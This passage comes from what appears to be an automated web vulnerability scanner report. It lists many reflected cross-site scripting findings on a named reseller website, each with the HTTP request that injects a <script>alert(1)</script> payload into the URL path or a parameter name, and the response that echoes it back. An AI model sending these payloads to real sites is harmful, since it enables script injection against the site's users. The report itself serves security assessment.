Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15b8f39<script>alert(1)</script>ddf40442aaf/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1242. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f64f6<script>alert(1)</script>25efaabce3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesf64f6<script>alert(1)</script>25efaabce3/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesf64f6<script>alert(1)</script>25efaabce3/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1243. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7219<script>alert(1)</script>95896aaa8ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmosb7219<script>alert(1)</script>95896aaa8ac/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmosb7219<script>alert(1)</script>95896aaa8ac/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1244. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84696<script>alert(1)</script>b9330668a96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images84696<script>alert(1)</script>b9330668a96/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images84696<script>alert(1)</script>b9330668a96/rating/ was not found on this server.</p>
...[SNIP]...

2.1245. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c154f<script>alert(1)</script>5d81cab7370 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/ratingc154f<script>alert(1)</script>5d81cab7370/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/ratingc154f<script>alert(1)</script>5d81cab7370/ was not found on this server.</p>
...[SNIP]...

2.1246. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cefff<script>alert(1)</script>216c2b82cf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/?cefff<script>alert(1)</script>216c2b82cf2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/?cefff<script>alert(1)</script>216c2b82cf2=1 was not found on this server.</p>
...[SNIP]...

2.1247. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef40f<script>alert(1)</script>e30cd32ead6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailef40f<script>alert(1)</script>e30cd32ead6/15/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailef40f<script>alert(1)</script>e30cd32ead6/15/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1248. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae65e<script>alert(1)</script>7a43d6649ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15ae65e<script>alert(1)</script>7a43d6649ff/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15ae65e<script>alert(1)</script>7a43d6649ff/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1249. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d401c<script>alert(1)</script>e09c262f367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesd401c<script>alert(1)</script>e09c262f367/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesd401c<script>alert(1)</script>e09c262f367/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1250. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3c39c<script>alert(1)</script>ce2bc0d6fbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos3c39c<script>alert(1)</script>ce2bc0d6fbc/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos3c39c<script>alert(1)</script>ce2bc0d6fbc/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1251. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7e735<script>alert(1)</script>6a2405b93a4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images7e735<script>alert(1)</script>6a2405b93a4/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images7e735<script>alert(1)</script>6a2405b93a4/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1252. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d34ab<script>alert(1)</script>2ea96998d78 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/ratingd34ab<script>alert(1)</script>2ea96998d78/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/ratingd34ab<script>alert(1)</script>2ea96998d78/0.gif was not found on this server.</p>
...[SNIP]...

2.1253. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 9c720<script>alert(1)</script>7b8949ae439 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/0.gif9c720<script>alert(1)</script>7b8949ae439 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/0.gif9c720<script>alert(1)</script>7b8949ae439 was not found on this server.</p>
...[SNIP]...

2.1254. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fcd9c<script>alert(1)</script>b8d1d43d3ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/0.gif?fcd9c<script>alert(1)</script>b8d1d43d3ea=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/0.gif?fcd9c<script>alert(1)</script>b8d1d43d3ea=1 was not found on this server.</p>
...[SNIP]...

2.1255. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b58d<script>alert(1)</script>6474145bad1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6b58d<script>alert(1)</script>6474145bad1/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6b58d<script>alert(1)</script>6474145bad1/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1256. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5eaa5<script>alert(1)</script>cab45a9270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/155eaa5<script>alert(1)</script>cab45a9270b/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/155eaa5<script>alert(1)</script>cab45a9270b/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1257. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9f9c<script>alert(1)</script>2d23a3146e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesb9f9c<script>alert(1)</script>2d23a3146e2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesb9f9c<script>alert(1)</script>2d23a3146e2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1258. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8a11<script>alert(1)</script>f699ed02235 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmosf8a11<script>alert(1)</script>f699ed02235/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmosf8a11<script>alert(1)</script>f699ed02235/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1259. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9947c<script>alert(1)</script>04cc6fab287 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images9947c<script>alert(1)</script>04cc6fab287/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images9947c<script>alert(1)</script>04cc6fab287/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1260. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d64f3<script>alert(1)</script>d9f01285b0d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

